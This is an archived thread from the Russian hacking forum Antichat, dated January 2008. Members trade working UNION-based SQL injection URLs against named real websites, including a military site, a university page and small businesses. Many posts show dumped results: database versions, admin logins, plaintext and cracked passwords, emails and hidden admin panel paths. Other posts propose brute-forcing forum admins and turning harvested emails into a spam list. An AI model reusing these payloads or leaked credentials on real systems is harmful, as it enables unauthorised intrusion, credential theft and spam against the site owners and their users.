ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.01.2008, 05:19
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
предистория)) нужно было найти траф.. ну а траф у нас где?) правильно еротика и тд 
поиск мне помог
нашли сайт
http://svalka.biz/go.php?go=Download&id=17985/*
http://svalka.biz/go.php?go=Download&id=17985+order+by+6/*
6 полей
http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3a3a,version(),user(),database()),3,4,5,6/*
#5.0.22-log::glamur_svalka@localhost::glamur_svalka
5-тая версия - тянем всю инфу
http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3a3a,version(),user(),database()),3,4,5,6+fro musers/*
http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME),3,4,5,6+from+in formation_schema.tables/*
таблици /*жалко видно таблици только этого хоста*/
glamur_svalka::admin
glamur_svalka::comments
glamur_svalka::downloads
glamur_svalka::fail_logs
glamur_svalka::iplogg
glamur_svalka::linker
glamur_svalka::main_logs
glamur_svalka::que
glamur_svalka::site_downloads
glamur_svalka::succes_logs
http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME,column_name),3,4 ,5,6+from+information_schema.columns/* ну и сами поля /*выбраны сами интересные таблы*/
glamur_svalka::succes_logs::time
glamur_svalka::succes_logs::date
glamur_svalka::succes_logs::ref
glamur_svalka::succes_logs::agent
glamur_svalka::succes_logs::hostname
glamur_svalka::succes_logs::ip
glamur_svalka::succes_logs:  assword
glamur_svalka::succes_logs::username
glamur_svalka::succes_logs::id
glamur_svalka::fail_logs::time
glamur_svalka::fail_logs::date
glamur_svalka::fail_logs::ref
glamur_svalka::fail_logs::agent
glamur_svalka::fail_logs::hostname
glamur_svalka::fail_logs::ip
glamur_svalka::fail_logs: assword
glamur_svalka::fail_logs::username
glamur_svalka::fail_logs::id
glamur_svalka::admin::id
glamur_svalka::admin::username
glamur_svalka::admin: assword
glamur_svalka::admin::email
glamur_svalka::admin::level
http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,id,username,password,email,level),3,4,5, 6+from+glamur_svalka.admin/*
достаем данные пользователей
1::admin::admin::webmaster@kindstot.org::1
мдям.. тяжелый пасс =\ теперь админка.. по стандартным местам ее нет.. смотрим в логах /*нестандартный ход)))*/
http://svalka.biz/go.php?go=Download&id=17985+union+select+1,concat_ ws(0x3A3a,ip,username,password,ref,hostname),3,4,5 ,6+from+glamur_svalka.succes_logs/*
и мне выдало адресс админки))
http://svalka.biz/admin/admincp.php?action=login или подругому
з.ы. в админке нет ничего особо интересного =\
з.з.ы. шел не залил =\ |
|
|
05.01.2008, 08:21
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
журнал ironman
таблицы, где встречается колонки похожие на "pass"
http://www.ironman.ru/php/news.php3?id=-1123+union+select+1,2,3,table_name,5,6,7,8+from+in formation_schema.columns+where+column_name+like+ch ar(37,112,97,115,115,37)+limit+0,1/*
имеется таблица - account - это от форума. форум кончелыжный, через него замутить ничего нельзя.
http://forum.ironman.ru
Admin:67423383
далее нашлась таблица curent_user - хер пойми что это. там одна запись всего - login assword
sportservice:470db2cf7130166ae97c78885413fdbd
расшифровал - c6h5cooh
есть админка:
http://ironman.ru/php/admin/
нихрена туда логины и пароли из форума и расшифрованные не катят (БЛ*ТЬ!!!)
есть вебмайл:
http://ironman.ru/webmail/
и phpmyadmin:
http://ironman.ru/myadmin/
добытые пароли, ествественно, никуда не подходят. доступ к таблице mysql.user - закрыт. что еще замутить я больше не знаю!
P.S. из базы имэйлов на форуме можно сделать спам-базу для рассылки рекламы виагры. Думаю, отдача будем ошелмляющей  (на форуме качки обсуждают стеройды)
|
|
|
|
05.01.2008, 08:44
|
|
Познающий
Регистрация: 28.12.2006
Сообщений: 44
Провел на форуме:
119257
Репутация:
56
|
|
http://www.centrgroup.ru/nn.php?id=-%201+union+select+1,2,3,4,5,concat(id,0x20,user_na me,0x3a,user_pass),7+from+users+where+id=0/*
Тока вот до админки не дорылся... 
Последний раз редактировалось RaDDeaD; 05.01.2008 в 09:42..
|
|
|
|
05.01.2008, 08:50
|
|
Познающий
Регистрация: 28.12.2006
Сообщений: 44
Провел на форуме:
119257
Репутация:
56
|
|
http:// www.tni.mil.id/patriotweb/?action=PesanSaran&ed=-1+union+select+0,1,concat(username,0x3a,password,0 x3a,email)+from+user/*
|
|
|
|
05.01.2008, 13:33
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
www.ipz.ru
http://www.ipz.ru/alltop.php?cat=-1+union+select+version()/*
Версия: 5.0.41-community
http://www.ipz.ru/alltop.php?cat=-1+union+select+concat(login,char(58),password,char (58),email)+from+users+limit+0,1/*
Там 1499 юзеров....Можно через Limit
|
|
|
|
05.01.2008, 15:16
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
вот поклоникам линейки:
http://info.l2r.ru/?part=items&id=@@version--
http://info.l2r.ru/?part=items&id=(select+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES)--
|
|
|
|
05.01.2008, 18:52
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154
Репутация:
140
|
|
http://www.chemistry.gatech.edu/events/special/index.php?sID=-3+union+select+1,2,3,4,5,concat_ws(char(58),userna me,pw),7,8,9,10,11,12,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,33+from+user_logins/*
|
|
|
|
05.01.2008, 19:39
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.olimpauto.ru/mercedes/index.php?ob=news_one_olimp&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*
4.1.22/wwwolimpautoru/olimpaut@localhost
-----------------------------------------------------------------------------
http://www.almatyfilmfestival.kz/index.php?mod=news&nid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10/*
4.1.22/affbase/affbase@localhost
-----------------------------------------------------------------------------
http://mosgroup-realty.ru/articles/all?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*
4.1.22-standard-log/mosgrou_db01/mosgrou_user0710@localhost
-----------------------------------------------------------------------------
historicalcenter.ru
http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws(0x2F,version(),database( ),user()),2/*
5.0.44-log/histcenter/histcenter@localhost
http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws(0x2F,login,passwd,email) ,2+from+users+limit+0,1/*
логин/пароль/мейл
ss/ss/serge@uzh.ru
|
|
|
|
05.01.2008, 19:42
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.oceansurf.ca/events.php?id=-8+union+select+1,2/*
4.1.20
-------------------------------------
http://www.rogerselectric.ca/projects.php?cid=-4+union+select+1,2,3,4,5,6,7/*
4.1.20
--------------------------------------
http://www.oakislandproductions.com/products.php?pid=-52+union+select+1,2,3,4,5,6,7,8,9,0/*
4.1.20
--------------------------------------
http://www.motelcleospa.com/treatments.php?cat=-1+union+select+1,2,3/*&lang=0
4.1.20
--------------------------------------
http://www.gowanbraegolf.nb.ca/news.php?id=-47+union+select+1,2,3,4,5/*
4.1.20
|
|
|
|
05.01.2008, 21:19
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
П А Д А Р К А !!!
www.gtanf.com
5.0.32-Debian_7etch3-log
юзеры ~ 5к
http://www.gtanf.com/forums/index.php?act=members
http://www.sanandreas-fr.net/?page=article&id=-4947+union+select+1,members_l_username,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+ibf_ members+limit+0,1/*
http://www.sanandreas-fr.net/?page=article&id=-4947+union+select+1,members_l_username,3,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+ibf_ members+limit+0,1/*
ищем админов брутим пасс и лезем в админку
на форуме 4 админа
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
